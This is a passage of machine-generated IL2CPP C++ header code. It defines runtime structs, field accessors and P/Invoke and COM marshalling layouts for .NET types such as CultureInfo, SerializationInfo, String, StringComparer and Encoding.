inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * get_s_DefaultThreadCurrentCulture_34() const { return ___s_DefaultThreadCurrentCulture_34; } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F ** get_address_of_s_DefaultThreadCurrentCulture_34() { return &___s_DefaultThreadCurrentCulture_34; } inline void set_s_DefaultThreadCurrentCulture_34(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * value) { ___s_DefaultThreadCurrentCulture_34 = value; Il2CppCodeGenWriteBarrier((&___s_DefaultThreadCurrentCulture_34), value); } inline static int32_t get_offset_of_shared_by_number_35() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___shared_by_number_35)); } inline Dictionary_2_tC88A56872F7C79DBB9582D4F3FC22ED5D8E0B98B * get_shared_by_number_35() const { return ___shared_by_number_35; } inline Dictionary_2_tC88A56872F7C79DBB9582D4F3FC22ED5D8E0B98B ** get_address_of_shared_by_number_35() { return &___shared_by_number_35; } inline void set_shared_by_number_35(Dictionary_2_tC88A56872F7C79DBB9582D4F3FC22ED5D8E0B98B * value) { ___shared_by_number_35 = value; Il2CppCodeGenWriteBarrier((&___shared_by_number_35), value); } inline static int32_t get_offset_of_shared_by_name_36() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___shared_by_name_36)); } inline Dictionary_2_tBA5388DBB42BF620266F9A48E8B859BBBB224E25 * get_shared_by_name_36() const { return ___shared_by_name_36; } inline Dictionary_2_tBA5388DBB42BF620266F9A48E8B859BBBB224E25 ** get_address_of_shared_by_name_36() { return &___shared_by_name_36; } inline void set_shared_by_name_36(Dictionary_2_tBA5388DBB42BF620266F9A48E8B859BBBB224E25 * value) { ___shared_by_name_36 = value; Il2CppCodeGenWriteBarrier((&___shared_by_name_36), value); } inline static int32_t get_offset_of_IsTaiwanSku_37() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___IsTaiwanSku_37)); } inline bool get_IsTaiwanSku_37() const { return ___IsTaiwanSku_37; } inline bool* get_address_of_IsTaiwanSku_37() { return &___IsTaiwanSku_37; } inline void set_IsTaiwanSku_37(bool value) { ___IsTaiwanSku_37 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.Globalization.CultureInfo struct CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_marshaled_pinvoke { int32_t ___m_isReadOnly_3; int32_t ___cultureID_4; int32_t ___parent_lcid_5; int32_t ___datetime_index_6; int32_t ___number_index_7; int32_t ___default_calendar_type_8; int32_t ___m_useUserOverride_9; NumberFormatInfo_tFDF57037EBC5BC833D0A53EF0327B805994860A8 * ___numInfo_10; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dateTimeInfo_11; TextInfo_t5F1E697CB6A7E5EC80F0DC3A968B9B4A70C291D8 * ___textInfo_12; char* ___m_name_13; char* ___englishname_14; char* ___nativename_15; char* ___iso3lang_16; char* ___iso2lang_17; char* ___win3lang_18; char* ___territory_19; char** ___native_calendar_names_20; CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ___compareInfo_21; void* ___textinfo_data_22; int32_t ___m_dataItem_23; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_24; CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_marshaled_pinvoke* ___parent_culture_25; int32_t ___constructed_26; uint8_t* ___cached_serialized_form_27; CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD_marshaled_pinvoke* ___m_cultureData_28; int32_t ___m_isInherited_29; }; // Native definition for COM marshalling of System.Globalization.CultureInfo struct CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_marshaled_com { int32_t ___m_isReadOnly_3; int32_t ___cultureID_4; int32_t ___parent_lcid_5; int32_t ___datetime_index_6; int32_t ___number_index_7; int32_t ___default_calendar_type_8; int32_t ___m_useUserOverride_9; NumberFormatInfo_tFDF57037EBC5BC833D0A53EF0327B805994860A8 * ___numInfo_10; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dateTimeInfo_11; TextInfo_t5F1E697CB6A7E5EC80F0DC3A968B9B4A70C291D8 * ___textInfo_12; Il2CppChar* ___m_name_13; Il2CppChar* ___englishname_14; Il2CppChar* ___nativename_15; Il2CppChar* ___iso3lang_16; Il2CppChar* ___iso2lang_17; Il2CppChar* ___win3lang_18; Il2CppChar* ___territory_19; Il2CppChar** ___native_calendar_names_20; CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ___compareInfo_21; void* ___textinfo_data_22; int32_t ___m_dataItem_23; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_24; CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_marshaled_com* ___parent_culture_25; int32_t ___constructed_26; uint8_t* ___cached_serialized_form_27; CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD_marshaled_com* ___m_cultureData_28; int32_t ___m_isInherited_29; }; #endif // CULTUREINFO_T345AC6924134F039ED9A11F3E03F8E91B6A3225F_H #ifndef MARSHALBYREFOBJECT_TC4577953D0A44D0AB8597CFA868E01C858B1C9AF_H #define MARSHALBYREFOBJECT_TC4577953D0A44D0AB8597CFA868E01C858B1C9AF_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.MarshalByRefObject struct MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF : public RuntimeObject { public: // System.Object System.MarshalByRefObject::_identity RuntimeObject * ____identity_0; public: inline static int32_t get_offset_of__identity_0() { return static_cast<int32_t>(offsetof(MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF, ____identity_0)); } inline RuntimeObject * get__identity_0() const { return ____identity_0; } inline RuntimeObject ** get_address_of__identity_0() { return &____identity_0; } inline void set__identity_0(RuntimeObject * value) { ____identity_0 = value; Il2CppCodeGenWriteBarrier((&____identity_0), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.MarshalByRefObject struct MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF_marshaled_pinvoke { Il2CppIUnknown* ____identity_0; }; // Native definition for COM marshalling of System.MarshalByRefObject struct MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF_marshaled_com { Il2CppIUnknown* ____identity_0; }; #endif // MARSHALBYREFOBJECT_TC4577953D0A44D0AB8597CFA868E01C858B1C9AF_H #ifndef MEMBERINFO_T_H #define MEMBERINFO_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Reflection.MemberInfo struct MemberInfo_t : public RuntimeObject { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // MEMBERINFO_T_H #ifndef SERIALIZATIONINFO_T1BB80E9C9DEA52DBF464487234B045E2930ADA26_H #define SERIALIZATIONINFO_T1BB80E9C9DEA52DBF464487234B045E2930ADA26_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Runtime.Serialization.SerializationInfo struct SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 : public RuntimeObject { public: // System.String[] System.Runtime.Serialization.SerializationInfo::m_members StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_members_0; // System.Object[] System.Runtime.Serialization.SerializationInfo::m_data ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* ___m_data_1; // System.Type[] System.Runtime.Serialization.SerializationInfo::m_types TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* ___m_types_2; // System.Collections.Generic.Dictionary`2<System.String,System.Int32> System.Runtime.Serialization.SerializationInfo::m_nameToIndex Dictionary_2_tD6E204872BA9FD506A0287EF68E285BEB9EC0DFB * ___m_nameToIndex_3; // System.Int32 System.Runtime.Serialization.SerializationInfo::m_currMember int32_t ___m_currMember_4; // System.Runtime.Serialization.IFormatterConverter System.Runtime.Serialization.SerializationInfo::m_converter RuntimeObject* ___m_converter_5; // System.String System.Runtime.Serialization.SerializationInfo::m_fullTypeName String_t* ___m_fullTypeName_6; // System.String System.Runtime.Serialization.SerializationInfo::m_assemName String_t* ___m_assemName_7; // System.Type System.Runtime.Serialization.SerializationInfo::objectType Type_t * ___objectType_8; // System.Boolean System.Runtime.Serialization.SerializationInfo::isFullTypeNameSetExplicit bool ___isFullTypeNameSetExplicit_9; // System.Boolean System.Runtime.Serialization.SerializationInfo::isAssemblyNameSetExplicit bool ___isAssemblyNameSetExplicit_10; // System.Boolean System.Runtime.Serialization.SerializationInfo::requireSameTokenInPartialTrust bool ___requireSameTokenInPartialTrust_11; public: inline static int32_t get_offset_of_m_members_0() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_members_0)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_members_0() const { return ___m_members_0; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_members_0() { return &___m_members_0; } inline void set_m_members_0(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_members_0 = value; Il2CppCodeGenWriteBarrier((&___m_members_0), value); } inline static int32_t get_offset_of_m_data_1() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_data_1)); } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* get_m_data_1() const { return ___m_data_1; } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A** get_address_of_m_data_1() { return &___m_data_1; } inline void set_m_data_1(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* value) { ___m_data_1 = value; Il2CppCodeGenWriteBarrier((&___m_data_1), value); } inline static int32_t get_offset_of_m_types_2() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_types_2)); } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* get_m_types_2() const { return ___m_types_2; } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F** get_address_of_m_types_2() { return &___m_types_2; } inline void set_m_types_2(TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* value) { ___m_types_2 = value; Il2CppCodeGenWriteBarrier((&___m_types_2), value); } inline static int32_t get_offset_of_m_nameToIndex_3() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_nameToIndex_3)); } inline Dictionary_2_tD6E204872BA9FD506A0287EF68E285BEB9EC0DFB * get_m_nameToIndex_3() const { return ___m_nameToIndex_3; } inline Dictionary_2_tD6E204872BA9FD506A0287EF68E285BEB9EC0DFB ** get_address_of_m_nameToIndex_3() { return &___m_nameToIndex_3; } inline void set_m_nameToIndex_3(Dictionary_2_tD6E204872BA9FD506A0287EF68E285BEB9EC0DFB * value) { ___m_nameToIndex_3 = value; Il2CppCodeGenWriteBarrier((&___m_nameToIndex_3), value); } inline static int32_t get_offset_of_m_currMember_4() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_currMember_4)); } inline int32_t get_m_currMember_4() const { return ___m_currMember_4; } inline int32_t* get_address_of_m_currMember_4() { return &___m_currMember_4; } inline void set_m_currMember_4(int32_t value) { ___m_currMember_4 = value; } inline static int32_t get_offset_of_m_converter_5() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_converter_5)); } inline RuntimeObject* get_m_converter_5() const { return ___m_converter_5; } inline RuntimeObject** get_address_of_m_converter_5() { return &___m_converter_5; } inline void set_m_converter_5(RuntimeObject* value) { ___m_converter_5 = value; Il2CppCodeGenWriteBarrier((&___m_converter_5), value); } inline static int32_t get_offset_of_m_fullTypeName_6() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_fullTypeName_6)); } inline String_t* get_m_fullTypeName_6() const { return ___m_fullTypeName_6; } inline String_t** get_address_of_m_fullTypeName_6() { return &___m_fullTypeName_6; } inline void set_m_fullTypeName_6(String_t* value) { ___m_fullTypeName_6 = value; Il2CppCodeGenWriteBarrier((&___m_fullTypeName_6), value); } inline static int32_t get_offset_of_m_assemName_7() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___m_assemName_7)); } inline String_t* get_m_assemName_7() const { return ___m_assemName_7; } inline String_t** get_address_of_m_assemName_7() { return &___m_assemName_7; } inline void set_m_assemName_7(String_t* value) { ___m_assemName_7 = value; Il2CppCodeGenWriteBarrier((&___m_assemName_7), value); } inline static int32_t get_offset_of_objectType_8() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___objectType_8)); } inline Type_t * get_objectType_8() const { return ___objectType_8; } inline Type_t ** get_address_of_objectType_8() { return &___objectType_8; } inline void set_objectType_8(Type_t * value) { ___objectType_8 = value; Il2CppCodeGenWriteBarrier((&___objectType_8), value); } inline static int32_t get_offset_of_isFullTypeNameSetExplicit_9() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___isFullTypeNameSetExplicit_9)); } inline bool get_isFullTypeNameSetExplicit_9() const { return ___isFullTypeNameSetExplicit_9; } inline bool* get_address_of_isFullTypeNameSetExplicit_9() { return &___isFullTypeNameSetExplicit_9; } inline void set_isFullTypeNameSetExplicit_9(bool value) { ___isFullTypeNameSetExplicit_9 = value; } inline static int32_t get_offset_of_isAssemblyNameSetExplicit_10() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___isAssemblyNameSetExplicit_10)); } inline bool get_isAssemblyNameSetExplicit_10() const { return ___isAssemblyNameSetExplicit_10; } inline bool* get_address_of_isAssemblyNameSetExplicit_10() { return &___isAssemblyNameSetExplicit_10; } inline void set_isAssemblyNameSetExplicit_10(bool value) { ___isAssemblyNameSetExplicit_10 = value; } inline static int32_t get_offset_of_requireSameTokenInPartialTrust_11() { return static_cast<int32_t>(offsetof(SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26, ___requireSameTokenInPartialTrust_11)); } inline bool get_requireSameTokenInPartialTrust_11() const { return ___requireSameTokenInPartialTrust_11; } inline bool* get_address_of_requireSameTokenInPartialTrust_11() { return &___requireSameTokenInPartialTrust_11; } inline void set_requireSameTokenInPartialTrust_11(bool value) { ___requireSameTokenInPartialTrust_11 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SERIALIZATIONINFO_T1BB80E9C9DEA52DBF464487234B045E2930ADA26_H #ifndef SERIALIZATIONINFOENUMERATOR_TB72162C419D705A40F34DDFEB18E6ACA347C54E5_H #define SERIALIZATIONINFOENUMERATOR_TB72162C419D705A40F34DDFEB18E6ACA347C54E5_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Runtime.Serialization.SerializationInfoEnumerator struct SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 : public RuntimeObject { public: // System.String[] System.Runtime.Serialization.SerializationInfoEnumerator::m_members StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___m_members_0; // System.Object[] System.Runtime.Serialization.SerializationInfoEnumerator::m_data ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* ___m_data_1; // System.Type[] System.Runtime.Serialization.SerializationInfoEnumerator::m_types TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* ___m_types_2; // System.Int32 System.Runtime.Serialization.SerializationInfoEnumerator::m_numItems int32_t ___m_numItems_3; // System.Int32 System.Runtime.Serialization.SerializationInfoEnumerator::m_currItem int32_t ___m_currItem_4; // System.Boolean System.Runtime.Serialization.SerializationInfoEnumerator::m_current bool ___m_current_5; public: inline static int32_t get_offset_of_m_members_0() { return static_cast<int32_t>(offsetof(SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5, ___m_members_0)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_m_members_0() const { return ___m_members_0; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_m_members_0() { return &___m_members_0; } inline void set_m_members_0(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___m_members_0 = value; Il2CppCodeGenWriteBarrier((&___m_members_0), value); } inline static int32_t get_offset_of_m_data_1() { return static_cast<int32_t>(offsetof(SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5, ___m_data_1)); } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* get_m_data_1() const { return ___m_data_1; } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A** get_address_of_m_data_1() { return &___m_data_1; } inline void set_m_data_1(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* value) { ___m_data_1 = value; Il2CppCodeGenWriteBarrier((&___m_data_1), value); } inline static int32_t get_offset_of_m_types_2() { return static_cast<int32_t>(offsetof(SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5, ___m_types_2)); } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* get_m_types_2() const { return ___m_types_2; } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F** get_address_of_m_types_2() { return &___m_types_2; } inline void set_m_types_2(TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* value) { ___m_types_2 = value; Il2CppCodeGenWriteBarrier((&___m_types_2), value); } inline static int32_t get_offset_of_m_numItems_3() { return static_cast<int32_t>(offsetof(SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5, ___m_numItems_3)); } inline int32_t get_m_numItems_3() const { return ___m_numItems_3; } inline int32_t* get_address_of_m_numItems_3() { return &___m_numItems_3; } inline void set_m_numItems_3(int32_t value) { ___m_numItems_3 = value; } inline static int32_t get_offset_of_m_currItem_4() { return static_cast<int32_t>(offsetof(SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5, ___m_currItem_4)); } inline int32_t get_m_currItem_4() const { return ___m_currItem_4; } inline int32_t* get_address_of_m_currItem_4() { return &___m_currItem_4; } inline void set_m_currItem_4(int32_t value) { ___m_currItem_4 = value; } inline static int32_t get_offset_of_m_current_5() { return static_cast<int32_t>(offsetof(SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5, ___m_current_5)); } inline bool get_m_current_5() const { return ___m_current_5; } inline bool* get_address_of_m_current_5() { return &___m_current_5; } inline void set_m_current_5(bool value) { ___m_current_5 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SERIALIZATIONINFOENUMERATOR_TB72162C419D705A40F34DDFEB18E6ACA347C54E5_H #ifndef STRING_T_H #define STRING_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.String struct String_t : public RuntimeObject { public: // System.Int32 System.String::m_stringLength int32_t ___m_stringLength_0; // System.Char System.String::m_firstChar Il2CppChar ___m_firstChar_1; public: inline static int32_t get_offset_of_m_stringLength_0() { return static_cast<int32_t>(offsetof(String_t, ___m_stringLength_0)); } inline int32_t get_m_stringLength_0() const { return ___m_stringLength_0; } inline int32_t* get_address_of_m_stringLength_0() { return &___m_stringLength_0; } inline void set_m_stringLength_0(int32_t value) { ___m_stringLength_0 = value; } inline static int32_t get_offset_of_m_firstChar_1() { return static_cast<int32_t>(offsetof(String_t, ___m_firstChar_1)); } inline Il2CppChar get_m_firstChar_1() const { return ___m_firstChar_1; } inline Il2CppChar* get_address_of_m_firstChar_1() { return &___m_firstChar_1; } inline void set_m_firstChar_1(Il2CppChar value) { ___m_firstChar_1 = value; } }; struct String_t_StaticFields { public: // System.String System.String::Empty String_t* ___Empty_5; public: inline static int32_t get_offset_of_Empty_5() { return static_cast<int32_t>(offsetof(String_t_StaticFields, ___Empty_5)); } inline String_t* get_Empty_5() const { return ___Empty_5; } inline String_t** get_address_of_Empty_5() { return &___Empty_5; } inline void set_Empty_5(String_t* value) { ___Empty_5 = value; Il2CppCodeGenWriteBarrier((&___Empty_5), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STRING_T_H #ifndef STRINGCOMPARER_T588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_H #define STRINGCOMPARER_T588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.StringComparer struct StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE : public RuntimeObject { public: public: }; struct StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_StaticFields { public: // System.StringComparer System.StringComparer::_invariantCulture StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * ____invariantCulture_0; // System.StringComparer System.StringComparer::_invariantCultureIgnoreCase StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * ____invariantCultureIgnoreCase_1; // System.StringComparer System.StringComparer::_ordinal StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * ____ordinal_2; // System.StringComparer System.StringComparer::_ordinalIgnoreCase StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * ____ordinalIgnoreCase_3; public: inline static int32_t get_offset_of__invariantCulture_0() { return static_cast<int32_t>(offsetof(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_StaticFields, ____invariantCulture_0)); } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * get__invariantCulture_0() const { return ____invariantCulture_0; } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE ** get_address_of__invariantCulture_0() { return &____invariantCulture_0; } inline void set__invariantCulture_0(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * value) { ____invariantCulture_0 = value; Il2CppCodeGenWriteBarrier((&____invariantCulture_0), value); } inline static int32_t get_offset_of__invariantCultureIgnoreCase_1() { return static_cast<int32_t>(offsetof(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_StaticFields, ____invariantCultureIgnoreCase_1)); } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * get__invariantCultureIgnoreCase_1() const { return ____invariantCultureIgnoreCase_1; } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE ** get_address_of__invariantCultureIgnoreCase_1() { return &____invariantCultureIgnoreCase_1; } inline void set__invariantCultureIgnoreCase_1(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * value) { ____invariantCultureIgnoreCase_1 = value; Il2CppCodeGenWriteBarrier((&____invariantCultureIgnoreCase_1), value); } inline static int32_t get_offset_of__ordinal_2() { return static_cast<int32_t>(offsetof(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_StaticFields, ____ordinal_2)); } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * get__ordinal_2() const { return ____ordinal_2; } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE ** get_address_of__ordinal_2() { return &____ordinal_2; } inline void set__ordinal_2(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * value) { ____ordinal_2 = value; Il2CppCodeGenWriteBarrier((&____ordinal_2), value); } inline static int32_t get_offset_of__ordinalIgnoreCase_3() { return static_cast<int32_t>(offsetof(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_StaticFields, ____ordinalIgnoreCase_3)); } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * get__ordinalIgnoreCase_3() const { return ____ordinalIgnoreCase_3; } inline StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE ** get_address_of__ordinalIgnoreCase_3() { return &____ordinalIgnoreCase_3; } inline void set__ordinalIgnoreCase_3(StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * value) { ____ordinalIgnoreCase_3 = value; Il2CppCodeGenWriteBarrier((&____ordinalIgnoreCase_3), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STRINGCOMPARER_T588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE_H #ifndef ENCODING_T7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_H #define ENCODING_T7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Text.Encoding struct Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 : public RuntimeObject { public: // System.Int32 System.Text.Encoding::m_codePage int32_t ___m_codePage_9; // System.Globalization.CodePageDataItem System.Text.Encoding::dataItem CodePageDataItem_t6E34BEE9CCCBB35C88D714664633AF6E5F5671FB * ___dataItem_10; // System.Boolean System.Text.Encoding::m_deserializedFromEverett bool ___m_deserializedFromEverett_11; // System.Boolean System.Text.Encoding::m_isReadOnly bool ___m_isReadOnly_12; // System.Text.EncoderFallback System.Text.Encoding::encoderFallback EncoderFallback_tDE342346D01608628F1BCEBB652D31009852CF63 * ___encoderFallback_13; // System.Text.DecoderFallback System.Text.Encoding::decoderFallback DecoderFallback_t128445EB7676870485230893338EF044F6B72F60 * ___decoderFallback_14; public: inline static int32_t get_offset_of_m_codePage_9() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4, ___m_codePage_9)); } inline int32_t get_m_codePage_9() const { return ___m_codePage_9; } inline int32_t* get_address_of_m_codePage_9() { return &___m_codePage_9; } inline void set_m_codePage_9(int32_t value) { ___m_codePage_9 = value; } inline static int32_t get_offset_of_dataItem_10() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4, ___dataItem_10)); } inline CodePageDataItem_t6E34BEE9CCCBB35C88D714664633AF6E5F5671FB * get_dataItem_10() const { return ___dataItem_10; } inline CodePageDataItem_t6E34BEE9CCCBB35C88D714664633AF6E5F5671FB ** get_address_of_dataItem_10() { return &___dataItem_10; } inline void set_dataItem_10(CodePageDataItem_t6E34BEE9CCCBB35C88D714664633AF6E5F5671FB * value) { ___dataItem_10 = value; Il2CppCodeGenWriteBarrier((&___dataItem_10), value); } inline static int32_t get_offset_of_m_deserializedFromEverett_11() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4, ___m_deserializedFromEverett_11)); } inline bool get_m_deserializedFromEverett_11() const { return ___m_deserializedFromEverett_11; } inline bool* get_address_of_m_deserializedFromEverett_11() { return &___m_deserializedFromEverett_11; } inline void set_m_deserializedFromEverett_11(bool value) { ___m_deserializedFromEverett_11 = value; } inline static int32_t get_offset_of_m_isReadOnly_12() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4, ___m_isReadOnly_12)); } inline bool get_m_isReadOnly_12() const { return ___m_isReadOnly_12; } inline bool* get_address_of_m_isReadOnly_12() { return &___m_isReadOnly_12; } inline void set_m_isReadOnly_12(bool value) { ___m_isReadOnly_12 = value; } inline static int32_t get_offset_of_encoderFallback_13() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4, ___encoderFallback_13)); } inline EncoderFallback_tDE342346D01608628F1BCEBB652D31009852CF63 * get_encoderFallback_13() const { return ___encoderFallback_13; } inline EncoderFallback_tDE342346D01608628F1BCEBB652D31009852CF63 ** get_address_of_encoderFallback_13() { return &___encoderFallback_13; } inline void set_encoderFallback_13(EncoderFallback_tDE342346D01608628F1BCEBB652D31009852CF63 * value) { ___encoderFallback_13 = value; Il2CppCodeGenWriteBarrier((&___encoderFallback_13), value); } inline static int32_t get_offset_of_decoderFallback_14() { return static_cast<int32_t>(offsetof(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4, ___decoderFallback_14)); } inline DecoderFallback_t128445EB7676870485230893338EF044F6B72F60 * get_decoderFallback_14() const { return ___decoderFallback_14; } inline DecoderFallback_t128445EB7676870485230893338EF044F6B72F60 ** get_address_of_decoderFallback_14() { return &___decoderFallback_14; } inline void set_decoderFallback_14(DecoderFallback_t128445EB7676870485230893338EF044F6B72F60 * value) { ___decoderFallback_14 = value; 